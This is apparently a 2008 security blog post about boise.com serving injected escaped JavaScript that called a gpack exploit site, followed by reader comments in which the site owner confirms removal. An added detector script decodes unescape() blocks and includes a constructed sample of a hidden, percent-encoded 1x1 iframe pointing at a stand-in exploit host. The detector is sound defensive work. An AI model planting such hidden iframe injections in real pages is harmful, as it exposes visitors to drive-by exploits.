Monday, March 31, 2008

Well, there goes the Montana option

or at least the Idaho variant.

Hi folks,

One of our in-house jokes is that the only real way to be safe on the Internet is to sell all your computers and move to Montana.

Regrettably, today we noticed that the innocent and bucolic sounding boise.com was showing up as carrying a link to a known exploit site.

Thinking it couldn't possibly be so, we went to look at the website thusly...



Looks innocent enough, but a view of the source reveals a chunk of escaped JavaScript ...



Aha! That looks suspicious.... And a look at our debug tool shows a call out to a gpack exploit site...



The web cams are actually pretty interesting, but we can't find any way to contact the site owner to tell him, so we thought we'd post it here.

Cheers

Roger
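For anyone who wants to check a page's source for this kind of injected block without loading it in a browser, here is an added example (not code from the original post or from the tool mentioned in it). It finds `unescape("...")` calls whose argument is mostly percent-escapes, decodes them statically without executing anything, and lists the URLs hidden inside. The sample page, the `example.invalid` host and the function names are constructed for illustration.

```javascript
// Decode %XX and %uXXXX escapes the way unescape() would, as plain string work only.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Report every unescape("...") call carrying at least minEscapes escape sequences.
// Short arguments such as "a%20b" are ordinary usage and are skipped.
function findEscapedScripts(html, minEscapes = 8) {
  const findings = [];
  const callRe = /unescape\(\s*(["'])([^"']*)\1\s*\)/g;
  let m;
  while ((m = callRe.exec(html)) !== null) {
    const arg = m[2];
    const escapes = (arg.match(/%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}/g) || []).length;
    if (escapes < minEscapes) continue;
    const decoded = decodeEscapes(arg);
    // Pull out any absolute URLs revealed by decoding (iframe/script sources).
    const urls = decoded.match(/https?:\/\/[^\s"'<>]+/g) || [];
    findings.push({ offset: m.index, escapes, decoded, urls });
  }
  return findings;
}

// Constructed sample: a hidden iframe, fully percent-encoded, written out via document.write.
const HIDDEN = '<iframe src="http://exploit.example.invalid/index.php" width=1 height=1></iframe>';
const ENCODED = Array.from(HIDDEN,
  c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SAMPLE_PAGE = `<html><body><h1>Web cams</h1>
<script>document.write(unescape("${ENCODED}"));</script>
<script>var q = unescape("a%20b");</script>
</body></html>`;

for (const f of findEscapedScripts(SAMPLE_PAGE)) {
  console.log(`offset ${f.offset}: ${f.escapes} escape sequences`);
  console.log('  decoded:', f.decoded);
  console.log('  urls   :', f.urls.join(', '));
}
```

This only catches the plain `unescape` pattern; a clean result does not rule out other forms of obfuscation.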

10 Comments:

At 7:30 AM, Anonymous Anonymous said...

Isn't Boise in Idaho?

 
At 9:59 AM, Blogger Roger Thompson said...

Yes... that's why I said "the Idaho variant"

:-)

 
At 6:37 AM, Anonymous Anonymous said...

Did you try using the Firefox tag and ask if you can have them contact since they have an affiliate id?

 
At 6:38 AM, Anonymous Anonymous said...

Did you try to backtrack from the Firefox tag and use the affiliate id?

Possible help from those folks to contact page owner?

 
At 2:29 PM, Anonymous Anonymous said...

We'll never be safe! :'(

 
At 6:12 AM, Anonymous Anonymous said...

I've been using AVG for months and, just today, stumbled upon this very informative blog. Thanks, Roger, for exploiting the "evil" sites out there. Someone has to do it. . .

Sincerely,

Your new fan in Orlando

 
At 12:58 PM, Anonymous Anonymous said...

Still active as of 4/30/08.....

 
At 5:29 AM, Blogger Lester said...

I am the owner of boise.com. I just received your email informing me of the offending script on the boise.com homepage. It has been removed and I am investigating when/how/who injected this code. Thank you for the notification.

 
At 5:59 AM, Blogger Lester said...

Oops, my mistake. I received an email sent May 3rd notifying me of the malicious code on boise.com. It referenced this blog and I erroneously thought you sent me the notification. I appreciate the heads-up Mr. Paul Broadwith sent, informing me that boise.com was hacked. Mr. Thompson, I'm not sure why you were unable to contact me as your blog post states. The public ownership information and email address for boise.com, though cryptic, is in fact correct and the email remailing address listed would have arrived to me. http://www.whois.net/whois_new.cgi?d=boise&tld=com

 
At 6:42 AM, Anonymous Anonymous said...

I contacted the site owner and have had a response today - he has confirmed that the script has been removed but I'm unable to verify at the moment.

Anybody else confirm?

 
